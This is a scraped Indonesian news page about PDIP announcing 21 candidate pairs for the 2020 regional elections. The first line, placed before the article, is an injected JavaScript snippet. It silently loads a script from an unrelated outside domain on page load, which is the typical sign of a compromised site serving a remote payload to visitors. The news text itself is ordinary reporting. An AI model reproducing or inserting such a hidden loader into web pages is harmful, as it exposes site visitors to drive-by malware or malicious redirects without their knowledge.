(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: NASIONAL

PDIP Umumkan 21 Pasangan Jelang Pendaftaran Kandidat, Kalsel Kembali Tak Disebut!


KANALKALIMANTAN.COM, JAKARTA – PDIP kembali mengumumkan 21 bakal pasangan calon yang akan diusung pada Pilkada Serentak 2020 jelang masa pendaftaran calon pada 4-6 September mendatang. Namun, kandidat calon Gubernur Kalsel tak muncul dalam pengumuman tersebut.

Nama-nama bakal pasangan calon diumumkan oleh Ketua DPP PDIP Puan Maharani. Ia didampingi Ketua Umum PDIP Megawati Soekarnoputri, Sekjen Hasto Krisiyanto, dan sejumlah petinggi partai banteng lainnya.

“Hari ini DPP PDI Perjuangan akan mengumumkan gelombang kelima terkait Pilkada 2020, yaitu dua provinsi dan sembilan kabupaten/kota,” kata Puan dalam pengumuman yang digelar secara virtual, Rabu (2/9).

Di Provinsi Bengkulu, PDIP mengusung Rohidin Mersyah-Rosjonsyah. Sementara di Provinsi Sumatera Barat, partai berlogo banteng itu mengusung Mulyadi-Ali Mukhni.

Kemudian di Kabupaten Mandailing Natal, Sumatera Utara, PDIP mengusung Dahlan Hasan Nasution-Aswin. Di Kabupaten Indragiri Hulu, Riau, ada pasangan Wahyu Adi-Supriati.

Di Sumatera Barat, PDIP mengusung tiga pasangan di tingkat kabupaten/kota. Mereka adalah Jon Enardi-Syafryddin di Tanah Datar, Iriadi DT Tumanggung-Agus Syahdeman di Solok, dan Dedi Rahmanto Putra-Arfianof Rajab di Pesisir Selatan.

Di Provinsi Bengkulu juga ada tiga pasangan, yaitu Dalhadi Umar-Wawan Fernandes di Lebong, Muhammad Faisal Manaf di Rejang Lebong, dan Ujang Syaripudin-Firdaus Djailani di Kepahiang.

Kemudian PDIP mengusung Abdul Rasid-Mustakim di Tanjung Jabung Timur, Jambi. PDIP juga mengusung Hendra Gunawan-Mulyana di Musi Waras, Sumatera Selatan. Adapun di Way Kanan, Lampung, PDIP mengusung Juprius-Rina Marlina.

Puan juga mengumumkan dukungan PDIP di Sumbawa, NTB, untuk Husni Djibril-Muhammad Ikhsan. Di Manado, Sulawesi Utara, ada pasangan Andrei Angouw-Richard H.M. Sualang. Sementara di Morowali Utara, Sulawesi Tengah ada Holiliana-Abudin Halilu.

Dalam kesempatan itu, PDIP juga mengumumkan paslon di empat daerah. Mereka adalah Achmad Afzam Arslan Djunaid-Salahudin di Pekalongan, dan Abdus Salam-Ifan Ariadna Wijaya di Jember.

Dukungan juga diberikan bagi Karna Suswandi-Khoirani di Situbondo, Kelana Aprilianto-Dwi Astutik di Sidoarjo, dan Ery Cahyadi-Armuji di Surabaya.

Di akhir pengumuman, Puan berpesan kepada seluruh kader PDIP untuk siap bertarung di Pilkada 2020. Ia mengharapkan kemenangan untuk pasangan-pasangan yang diusung PDIP tahun ini.

“Kepada seluruh calon, jajaran partai, untuk bersama dengan rakyat, merangkul rakyat, dan merebut hati rakyat dalam memenangkan pilkasa 9 Desember 2020,” ucapnya.

Pendaftaran pasangan calon Pilkada Serentak 2020 akan berlangsung pada 4-6 September. Setelah disahkan pada 23 September, para kandidat langsung dipersilakan berkampanye. Waktu pencoblosan akan jatuh pada 9 Desember 2020.(Kanalkalimantan.com/cnnindonesia)

 

Editor: Cell

 


Desy Arfianty

Recent Posts

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

19 menit ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

1 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

3 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

3 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

3 jam ago

This website uses cookies.